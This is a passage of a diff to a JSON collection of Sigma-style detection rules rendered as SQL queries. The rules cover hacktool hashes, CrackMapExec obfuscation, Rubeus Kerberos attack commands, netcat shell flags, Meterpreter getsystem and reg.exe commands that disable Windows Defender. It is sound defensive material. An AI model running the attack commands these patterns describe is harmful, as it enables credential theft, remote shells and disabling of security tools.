'959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', 
'8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b') OR (Hashes LIKE 
'%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE 
'\\' OR Hashes LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE 
'\\' OR Hashes LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\')))" ], - "filename": "posh_pm_susp_invocation_specific.yml" + "filename": "proc_creation_win_hktl_execution_via_imphashes.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", - "id": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", - "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "HackTool - CrackMapExec PowerShell Obfuscation", + "id": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", + "status": "test", + "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%join%split%' ESCAPE '\\' OR CommandLine LIKE '%( $ShellId[1]+$ShellId[13]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $PSHome[%]+$PSHOME[%]+%' ESCAPE '\\' OR CommandLine LIKE '%( $env:Public[13]+$env:Public[5]+''x'')%' ESCAPE '\\' OR 
CommandLine LIKE '%( $env:ComSpec[4,%,25]-Join'''')%' ESCAPE '\\' OR CommandLine LIKE '%[1,3]+''x''-Join'''')%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml" }, { - "title": "Suspicious Get-ADDBAccount Usage", - "id": "b140afd9-474b-4072-958e-2ebb435abd68", - "status": "test", - "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Reg Add BitLocker", + "id": "0e0255bf-2548-47b8-9582-c0955c9283f5", + "status": "experimental", + "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-ADDBAccount%' ESCAPE '\\' AND Payload LIKE '%BootKey %' ESCAPE '\\' AND Payload LIKE '%DatabasePath %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%REG%' ESCAPE '\\' AND CommandLine LIKE '%ADD%' ESCAPE '\\' AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\' AND (CommandLine LIKE '%EnableBDEWithNoTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseAdvancedStartup%' ESCAPE '\\' OR CommandLine LIKE '%UseTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKey%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKeyPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessageSource%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMPIN%' ESCAPE '\\' OR 
CommandLine LIKE '%RecoveryKeyMessage%' ESCAPE '\\'))" ], - "filename": "posh_pm_get_addbaccount.yml" + "filename": "proc_creation_win_reg_bitlocker.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - PowerShell Module", - "id": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", + "title": "Add Potential Suspicious New Download Source To Winget", + "id": "c15a46a0-07d4-4c87-b4b6-89207835a83b", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects usage of winget to add new potentially suspicious download sources", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\') AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}')" ], - "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_winget_add_susp_custom_source.yml" }, { - "title": "Vulnerable Lenovo Driver Load", - "id": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", - "status": "experimental", - "description": "Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", + "title": "HackTool - Rubeus Execution", + "id": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", + "status": "stable", + "description": "Detects the execution of the hacktool Rubeus via PE information of 
command line parameters", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543" + "attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Legitimate driver loads (old driver that didn't receive an update)" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((Hashes LIKE '%SHA256=F05B1EE9E2F6AB704B8919D5071BECBCE6F9D0F9D0BA32A460C41D5272134ABE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F%' ESCAPE '\\' OR Hashes LIKE '%MD5=B941C8364308990EE4CC6EADF7214E0F%' ESCAPE '\\') OR sha256 = 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe' OR sha1 = 'b89a8eef5aeae806af5ba212a8068845cafdab6f' OR md5 = 'b941c8364308990ee4cc6eadf7214e0f')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Rubeus.exe' ESCAPE '\\' OR OriginalFileName = 'Rubeus.exe' OR Description = 'Rubeus' OR (CommandLine LIKE '%asreproast %' ESCAPE '\\' OR CommandLine LIKE '%dump /service:krbtgt %' ESCAPE '\\' OR CommandLine LIKE '%dump /luid:0x%' ESCAPE '\\' OR CommandLine LIKE '%kerberoast %' ESCAPE '\\' OR CommandLine LIKE '%createnetonly /program:%' ESCAPE '\\' OR CommandLine LIKE '%ptt /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%/impersonateuser:%' ESCAPE '\\' OR CommandLine LIKE '%renew /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%asktgt /user:%' ESCAPE '\\' OR CommandLine LIKE '%harvest /interval:%' ESCAPE '\\' OR CommandLine LIKE '%s4u /user:%' ESCAPE '\\' OR CommandLine LIKE '%s4u /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%hash /password:%' ESCAPE '\\' OR CommandLine LIKE '%golden /aes256:%' ESCAPE '\\' OR CommandLine LIKE '%silver /user:%' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_lenovo_driver.yml" + "filename": "proc_creation_win_hktl_rubeus.yml" }, { - "title": "Vulnerable HackSys 
Extreme Vulnerable Driver Load", - "id": "295c9289-acee-4503-a571-8eacaef36b28", + "title": "PUA - Netcat Suspicious Execution", + "id": "e31033fc-33f0-4020-9a16-faf9b31cbf08", "status": "experimental", - "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.command_and_control", + "attack.t1095" ], "falsepositives": [ - "Unlikely" + "Legitimate ncat use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\HEVD.sys' ESCAPE '\\' OR (Hashes LIKE '%IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c46ea2e651fd5f7f716c8867c6d13594%' ESCAPE '\\') OR Imphash IN ('f26d0b110873a1c7d8c4f08fbeab89c5', 'c46ea2e651fd5f7f716c8867c6d13594'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\nc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ncat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netcat.exe' ESCAPE '\\') OR (CommandLine LIKE '% -lvp %' ESCAPE '\\' OR CommandLine LIKE '% -lvnp%' ESCAPE '\\' OR CommandLine LIKE '% -l -v -p %' ESCAPE '\\' OR CommandLine LIKE '% -lv -p %' ESCAPE '\\' OR CommandLine LIKE '% -l --proxy-type http %' ESCAPE '\\' OR CommandLine LIKE '% -vnl --exec %' ESCAPE '\\' OR CommandLine LIKE '% -vnl -e %' ESCAPE '\\' OR CommandLine LIKE '% --lua-exec %' ESCAPE '\\' OR CommandLine LIKE '% --sh-exec %' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_hevd_driver.yml" + 
"filename": "proc_creation_win_pua_netcat.yml" }, { - "title": "PowerShell Scripts Run by a Services", - "id": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", + "title": "Potential Meterpreter/CobaltStrike Activity", + "id": "15619216-e993-4721-b590-4c520615a67d", "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Unknown" + "Commandlines containing components like cmd accidentally", + "Jobs and services started with cmd" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%powershell%' ESCAPE '\\' OR ImageLoaded LIKE '%pwsh%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%\\\\pipe\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%cmd%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%.dll,a%' ESCAPE '\\' AND CommandLine LIKE '%/p:%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%MpCmdRun%' ESCAPE '\\')))" ], - "filename": "driver_load_win_powershell_script_installed_as_service.yml" + "filename": "proc_creation_win_hktl_meterpreter_getsystem.yml" }, { - "title": "WinDivert Driver Load", - "id": "679085d5-f427-4484-9f58-1dc30a7c426d", + "title": "Reg Disable Security Service", + "id": "5e95028c-5229-4214-afae-d653d573d0ec", "status": "experimental", - "description": "Detects the load of the Windiver driver, a powerful user-mode 
capture/sniffing/modification/blocking/re-injection package for Windows", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", + "author": "Florian Roth (Nextron Systems), John Lambert (idea), elhoim", "tags": [ - "attack.collection", "attack.defense_evasion", - "attack.t1599.001", - "attack.t1557.001" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate WinDivert driver usage" + "Unknown", + "Other security solution installers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\WinDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinDivert64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NordDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lingtiwfp.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eswfp.sys%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=0604bb7cb4bb851e2168d5c7d9399087%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2e5f0e649d97f32b03c09e4686d0574f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=52f8aa269f69f0edad9e8fcdaedce276%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c0e5d314da39dbf65a2dbff409cc2c76%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=58623490691babe8330adc81cd04a663%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8ee39b48656e4d6b8459d7ba7da7438b%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=45ee545ae77e8d43fc70ede9efcd4c96%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a1b2e245acd47e4a348e1a552a02859a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2a5f85fe4609461c6339637594fa9b0a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6b2c6f95233c2914d1d488ee27531acc%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9f2fdd3f9ab922bbb0560a7df46f4342%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=d8a719865c448b1bd2ec241e46ac1c88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0ea54f8c9af4a2fe8367fa457f48ed38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9d519ae0a0864d6d6ae3f8b6c9c70af6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a74929edfc3289895e3f2885278947ae%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=a66b476c2d06c370f0a53b5537f2f11e%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bdcd836a46bc2415773f6b5ea77a46e4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c28cd6ccd83179e79dac132a553693d9%' ESCAPE '\\') OR Imphash IN ('0604bb7cb4bb851e2168d5c7d9399087', '2e5f0e649d97f32b03c09e4686d0574f', '52f8aa269f69f0edad9e8fcdaedce276', 'c0e5d314da39dbf65a2dbff409cc2c76', '58623490691babe8330adc81cd04a663', '8ee39b48656e4d6b8459d7ba7da7438b', '45ee545ae77e8d43fc70ede9efcd4c96', 'a1b2e245acd47e4a348e1a552a02859a', '2a5f85fe4609461c6339637594fa9b0a', '6b2c6f95233c2914d1d488ee27531acc', '9f2fdd3f9ab922bbb0560a7df46f4342', 'd8a719865c448b1bd2ec241e46ac1c88', '0ea54f8c9af4a2fe8367fa457f48ed38', '9d519ae0a0864d6d6ae3f8b6c9c70af6', 'a74929edfc3289895e3f2885278947ae', 'a66b476c2d06c370f0a53b5537f2f11e', 'bdcd836a46bc2415773f6b5ea77a46e4', 'c28cd6ccd83179e79dac132a553693d9'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') AND ((CommandLine LIKE '% /d 4%' ESCAPE '\\' AND CommandLine LIKE '% /v Start%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Sense%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsMpSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\NisSrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdBoot%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisDrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wscsvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SecurityHealthService%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wuauserv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\UsoSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdFilter%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppIDSvc%' ESCAPE '\\')) OR (CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Windows Defender%' ESCAPE '\\' AND (CommandLine LIKE '%DisableIOAVProtection%' ESCAPE '\\' OR CommandLine LIKE 